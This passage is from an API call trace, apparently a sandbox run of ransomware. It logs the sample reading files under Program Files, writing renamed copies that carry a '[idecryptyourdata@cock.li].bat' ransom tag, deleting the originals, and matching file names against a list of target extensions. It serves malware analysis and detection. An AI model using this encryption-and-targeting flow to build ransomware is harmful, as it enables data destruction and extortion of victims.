lpNumberOfBytesWritten=0x375fc94*=0xb30, lpOverlapped=0x0) returned 1 [0202.125] ReadFile (in: hFile=0x390, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x0, lpOverlapped=0x0) returned 1 [0202.126] WriteFile (in: hFile=0x330, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0xfa, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0xfa, lpOverlapped=0x0) returned 1 [0202.126] SetEndOfFile (hFile=0x330) returned 1 [0202.126] CloseHandle (hObject=0x330) returned 1 [0202.126] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0202.126] SetEndOfFile (hFile=0x390) returned 1 [0202.127] CloseHandle (hObject=0x390) returned 1 [0202.127] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0202.130] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages.properties")) returned 1 [0202.130] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties") returned 65 [0202.130] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties") returned 65 [0202.130] lstrlenW (lpString=".doc") returned 4 [0202.130] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0202.130] lstrlenW (lpString=".docx") returned 5 [0202.130] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0202.130] lstrlenW (lpString=".pdf") returned 4 [0202.130] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0202.130] lstrlenW (lpString=".xls") returned 4 [0202.130] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0202.130] lstrlenW (lpString=".xlsx") returned 5 [0202.130] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0202.130] lstrlenW (lpString=".ppt") returned 4 [0202.130] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0202.131] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties") returned 65 [0202.131] lstrlenW (lpString=".zip") returned 4 [0202.131] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0202.131] lstrlenW (lpString=".rar") returned 4 [0202.131] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0202.131] lstrlenW (lpString=".bz2") returned 4 [0202.131] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0202.131] lstrlenW (lpString=".7z") returned 3 [0202.131] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0202.131] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties") returned 65 [0202.131] lstrlenW (lpString=".dbf") returned 4 [0202.131] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0202.131] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties") returned 65 [0202.131] lstrlenW (lpString=".1cd") returned 4 [0202.131] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0202.131] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties") returned 65 [0202.131] lstrlenW (lpString=".jpg") returned 4 [0202.131] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0202.131] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties") returned 65 [0202.131] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties") returned 65 [0202.131] lstrlenW (lpString=".doc") returned 4 [0202.131] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0202.131] lstrlenW (lpString=".docx") returned 5 [0202.131] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0202.131] lstrlenW (lpString=".pdf") returned 4 [0202.131] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0202.138] lstrlenW (lpString=".xls") returned 4 [0202.138] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0202.138] lstrlenW (lpString=".xlsx") returned 5 [0202.138] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0202.138] lstrlenW (lpString=".ppt") returned 4 [0202.138] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0202.138] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties") returned 65 [0202.138] lstrlenW (lpString=".zip") returned 4 [0202.138] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0202.138] lstrlenW (lpString=".rar") returned 4 [0202.138] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0202.138] lstrlenW (lpString=".bz2") returned 4 [0202.138] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0202.138] lstrlenW (lpString=".7z") returned 3 [0202.138] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0202.138] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties") returned 65 [0202.138] lstrlenW (lpString=".dbf") returned 4 [0202.138] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0202.139] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties") returned 65 [0202.139] lstrlenW (lpString=".1cd") returned 4 [0202.139] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0202.139] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties") returned 65 [0202.139] lstrlenW (lpString=".jpg") returned 4 [0202.139] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0202.139] lstrcmpiW (lpString1=".properties", lpString2=".bat") returned 1 [0202.139] lstrlenW (lpString="messages_es.properties") returned 22 [0202.139] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0202.140] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=3600) returned 1 [0202.140] CloseHandle (hObject=0x3a4) returned 1 [0202.140] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties")) returned 0x20 [0202.140] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0202.140] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0202.140] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0202.140] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0202.140] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0202.141] GetLastError () returned 0x0 [0202.141] ReadFile (hFile=0x3a4, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0) Thread: id = 97 os_tid = 0x90c [0178.090] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10000) returned 0x3cd0988 [0178.091] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10000) returned 0x3ce0990 [0178.091] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6de378 [0178.091] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x6) returned 0x70c1c0 [0178.091] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6de390 [0178.091] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100000) returned 0x426c020 [0178.094] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6de180 [0178.094] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6de180, Size=0x20) returned 0x6beea8 [0178.094] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6de1b0 [0178.094] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6de1b0, Size=0x20) returned 0x6bef48 [0178.094] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77050000 [0178.094] GetProcAddress (hModule=0x77050000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77066b30 [0178.094] Wow64DisableWow64FsRedirection (in: OldValue=0x389ff50 | out: OldValue=0x389ff50*=0x0) returned 1 [0178.094] lstrlenW (lpString="kernel32.dll") returned 12 [0178.094] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6beea8 | out: hHeap=0x680000) returned 1 [0178.094] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0178.094] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x680000) returned 1 [0178.095] Sleep (dwMilliseconds=0x64) [0178.334] Sleep (dwMilliseconds=0x64) [0178.689] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0178.689] lstrlenW (lpString="api-ms-win-crt-multibyte-l1-1-0.dll") returned 35 [0178.689] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-multibyte-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0178.690] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=26816) returned 1 [0178.690] CloseHandle (hObject=0x358) returned 1 [0178.690] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-multibyte-l1-1-0.dll")) returned 0x20 [0178.690] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-multibyte-l1-1-0.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0178.690] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-multibyte-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0178.690] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0178.691] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0178.691] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-multibyte-l1-1-0.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x35c [0178.692] GetLastError () returned 0x0 [0178.692] ReadFile (in: hFile=0x358, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x68c0, lpOverlapped=0x0) returned 1 [0178.713] WriteFile (in: hFile=0x35c, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0x68d0, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0x68d0, lpOverlapped=0x0) returned 1 [0178.715] ReadFile (in: hFile=0x358, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x0, lpOverlapped=0x0) returned 1 [0178.715] WriteFile (in: hFile=0x35c, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0x11a, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0x11a, lpOverlapped=0x0) returned 1 [0178.715] SetEndOfFile (hFile=0x35c) returned 1 [0178.715] CloseHandle (hObject=0x35c) returned 1 [0178.715] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0178.715] SetEndOfFile (hFile=0x358) returned 1 [0178.716] CloseHandle (hObject=0x358) returned 1 [0178.716] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0178.717] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-multibyte-l1-1-0.dll")) returned 1 [0178.717] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll") returned 93 [0178.717] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll") returned 93 [0178.717] lstrlenW (lpString=".doc") returned 4 [0178.717] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0178.717] lstrlenW (lpString=".docx") returned 5 [0178.717] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0178.717] lstrlenW (lpString=".pdf") returned 4 [0178.717] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0178.717] lstrlenW (lpString=".xls") returned 4 [0178.717] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0178.717] lstrlenW (lpString=".xlsx") returned 5 [0178.717] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0178.717] lstrlenW (lpString=".ppt") returned 4 [0178.717] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0178.717] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll") returned 93 [0178.717] lstrlenW (lpString=".zip") returned 4 [0178.717] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0178.718] lstrlenW (lpString=".rar") returned 4 [0178.718] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0178.718] lstrlenW (lpString=".bz2") returned 4 [0178.718] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0178.718] lstrlenW (lpString=".7z") returned 3 [0178.718] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0178.718] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll") returned 93 [0178.718] lstrlenW (lpString=".dbf") returned 4 [0178.718] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0178.718] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll") returned 93 [0178.718] lstrlenW (lpString=".1cd") returned 4 [0178.718] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0178.718] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll") returned 93 [0178.718] lstrlenW (lpString=".jpg") returned 4 [0178.718] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0178.718] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll") returned 93 [0178.718] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll") returned 93 [0178.718] lstrlenW (lpString=".doc") returned 4 [0178.718] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0178.718] lstrlenW (lpString=".docx") returned 5 [0178.718] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0178.718] lstrlenW (lpString=".pdf") returned 4 [0178.718] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0178.719] lstrlenW (lpString=".xls") returned 4 [0178.719] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0178.719] lstrlenW (lpString=".xlsx") returned 5 [0178.719] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0178.719] lstrlenW (lpString=".ppt") returned 4 [0178.719] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0178.719] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll") returned 93 [0178.719] lstrlenW (lpString=".zip") returned 4 [0178.719] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0178.719] lstrlenW (lpString=".rar") returned 4 [0178.719] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0178.719] lstrlenW (lpString=".bz2") returned 4 [0178.719] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0178.719] lstrlenW (lpString=".7z") returned 3 [0178.719] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0178.719] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll") returned 93 [0178.719] lstrlenW (lpString=".dbf") returned 4 [0178.719] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0178.719] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll") returned 93 [0178.719] lstrlenW (lpString=".1cd") returned 4 [0178.719] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0178.719] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-multibyte-l1-1-0.dll") returned 93 [0178.719] lstrlenW (lpString=".jpg") returned 4 [0178.719] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0178.720] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0178.720] lstrlenW (lpString="api-ms-win-crt-process-l1-1-0.dll") returned 33 [0178.720] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-process-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0178.720] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=19648) returned 1 [0178.720] CloseHandle (hObject=0x358) returned 1 [0178.720] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-process-l1-1-0.dll")) returned 0x20 [0178.720] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-process-l1-1-0.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0178.720] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-process-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0178.721] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0178.721] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0178.721] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-process-l1-1-0.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x35c [0178.722] GetLastError () returned 0x0 [0178.722] ReadFile (in: hFile=0x358, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x4cc0, lpOverlapped=0x0) returned 1 [0178.736] WriteFile (in: hFile=0x35c, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0x4cd0, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0x4cd0, lpOverlapped=0x0) returned 1 [0178.737] ReadFile (in: hFile=0x358, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x0, lpOverlapped=0x0) returned 1 [0178.737] WriteFile (in: hFile=0x35c, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0x116, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0x116, lpOverlapped=0x0) returned 1 [0178.737] SetEndOfFile (hFile=0x35c) returned 1 [0178.737] CloseHandle (hObject=0x35c) returned 1 [0178.737] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0178.737] SetEndOfFile (hFile=0x358) returned 1 [0178.738] CloseHandle (hObject=0x358) returned 1 [0178.738] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0178.738] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-process-l1-1-0.dll")) returned 1 [0178.739] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll") returned 91 [0178.739] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll") returned 91 [0178.739] lstrlenW (lpString=".doc") returned 4 [0178.739] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0178.739] lstrlenW (lpString=".docx") returned 5 [0178.739] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0178.739] lstrlenW (lpString=".pdf") returned 4 [0178.739] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0178.739] lstrlenW (lpString=".xls") returned 4 [0178.739] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0178.739] lstrlenW (lpString=".xlsx") returned 5 [0178.739] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0178.739] lstrlenW (lpString=".ppt") returned 4 [0178.739] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0178.739] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll") returned 91 [0178.739] lstrlenW (lpString=".zip") returned 4 [0178.739] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0178.739] lstrlenW (lpString=".rar") returned 4 [0178.739] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0178.739] lstrlenW (lpString=".bz2") returned 4 [0178.739] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0178.739] lstrlenW (lpString=".7z") returned 3 [0178.739] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0178.739] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll") returned 91 [0178.739] lstrlenW (lpString=".dbf") returned 4 [0178.739] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0178.739] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll") returned 91 [0178.739] lstrlenW (lpString=".1cd") returned 4 [0178.739] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0178.740] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll") returned 91 [0178.740] lstrlenW (lpString=".jpg") returned 4 [0178.740] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0178.740] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll") returned 91 [0178.740] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll") returned 91 [0178.740] lstrlenW (lpString=".doc") returned 4 [0178.740] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0178.740] lstrlenW (lpString=".docx") returned 5 [0178.740] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0178.740] lstrlenW (lpString=".pdf") returned 4 [0178.740] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0178.740] lstrlenW (lpString=".xls") returned 4 [0178.740] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0178.740] lstrlenW (lpString=".xlsx") returned 5 [0178.740] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0178.740] lstrlenW (lpString=".ppt") returned 4 [0178.740] lstrcmpiW 